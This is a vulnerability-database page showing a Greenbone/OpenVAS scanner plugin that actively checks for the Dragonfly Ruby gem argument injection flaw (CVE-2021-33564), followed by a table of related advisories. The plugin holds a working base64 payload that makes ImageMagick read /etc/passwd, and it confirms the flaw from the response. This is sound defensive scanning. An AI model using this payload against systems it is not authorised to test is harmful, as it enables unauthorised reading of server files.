Lucene search
+L

Dragonfly Ruby Gem < 1.4.0 Argument Injection Vulnerability - Active Check

🗓️ 01 Jun 2021 00:00:00Reported by Copyright (C) 2021 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 14 Views

Dragonfly Ruby Gem < 1.4.0 Argument Injection Vulnerability - Active Chec

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for Argument Injection in Dragonfly_Project Dragonfly
25 May 202102:48
githubexploit
githubexploit
GithubExploit
Exploit for Argument Injection in Dragonfly_Project Dragonfly
27 May 202115:44
githubexploit
attackerkb
ATTACKERKB
CVE-2021-33564
29 May 202114:15
attackerkb
freebsd
FreeBSD
dragonfly -- argument injection
24 May 202100:00
freebsd
circl
Circl
CVE-2021-33564
28 May 202111:43
circl
cnnvd
CNNVD
Ruby 参数注入漏洞
29 May 202100:00
cnnvd
cnvd
CNVD
Ruby Parameter Injection Vulnerability
2 Jun 202100:00
cnvd
cve
CVE
CVE-2021-33564
29 May 202113:19
cve
cvelist
Cvelist
CVE-2021-33564
29 May 202113:19
cvelist
dsquare
Dsquare
Dragonfly Ruby Gem File Disclosure
28 May 202100:00
dsquare
Rows per page
# SPDX-FileCopyrightText: 2021 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.146048");
  script_version("2025-01-21T05:37:33+0000");
  script_tag(name:"last_modification", value:"2025-01-21 05:37:33 +0000 (Tue, 21 Jan 2025)");
  script_tag(name:"creation_date", value:"2021-06-01 05:13:21 +0000 (Tue, 01 Jun 2021)");
  script_tag(name:"cvss_base", value:"6.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2021-06-10 15:20:00 +0000 (Thu, 10 Jun 2021)");

  script_cve_id("CVE-2021-33564");

  script_tag(name:"qod_type", value:"exploit");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Dragonfly Ruby Gem < 1.4.0 Argument Injection Vulnerability - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2021 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "global_settings.nasl", "os_detection.nasl");
  script_mandatory_keys("Host/runs_unixoide");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"summary", value:"Dragonfly Ruby Gem is prone to an argument injection vulnerability.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"insight", value:"An argument injection vulnerability in the Dragonfly gem for
  Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the
  verify_url option is disabled. This may lead to code execution. The problem occurs because the
  generate and process features mishandle use of the ImageMagick convert utility.");

  script_tag(name:"affected", value:"Dragonfly Ruby Gem versions prior to 1.4.0.");

  script_tag(name:"solution", value:"Update to version 1.4.0 or later.");

  script_xref(name:"URL", value:"https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/");
  script_xref(name:"URL", value:"https://github.com/markevans/dragonfly/issues/513");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("list_array_func.inc");
include("port_service_func.inc");

port = http_get_port(default: 80);

foreach dir (make_list_unique("/", http_cgi_dirs(port: port))) {
  res = http_get_cache(port: port, item: dir);

  # e.g. /system/refinery/images/W1siZiIsIjIwMjEvMDEvMTEvMDgvMjgvMjEvNGM0ODY1YWMtODU2ZS00MzlhLTlhN2UtZjI0MjBiOGM5NzljL21vYmlsZS1iYW5uZXItMi5qcGciXSxbInAiLCJ0aHVtYiIsIjc1MHg2NjAjYyJdXQ/banner.jpg
  # /system/images/W1siZiIsIjIwMTgvMDkvMTgvMDMvMDUvNDYvMzUvS0FSMDExX0thcmllZ2FfTWFpbl9Mb2RnZS5qcGciXSxbInAiLCJ0aHVtYiIsIjEzMHg2NSNjIl1d/example.jpg"
  path = eregmatch(pattern: "(/system([^ ]+)?/images/)W1si", string: res);
  if (isnull(path[1]))
    exit(0);

  payload = "W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==";

  if (dir == "/")
    dir = "";

  url = dir + path[1] + payload;

  if (http_vuln_check(port: port, url: url, pattern: "(root|admin|nobody):[^:]*:[0-9]+:(-2|[0-9]+):([^:]*:){2}",
                      check_header: TRUE)) {
    report = http_report_vuln_url(port: port, url: url);
    security_message(port: port, data: report);
    exit(0);
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jan 2025 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 26.8
CVSS 3.19.8
EPSS0.72143
14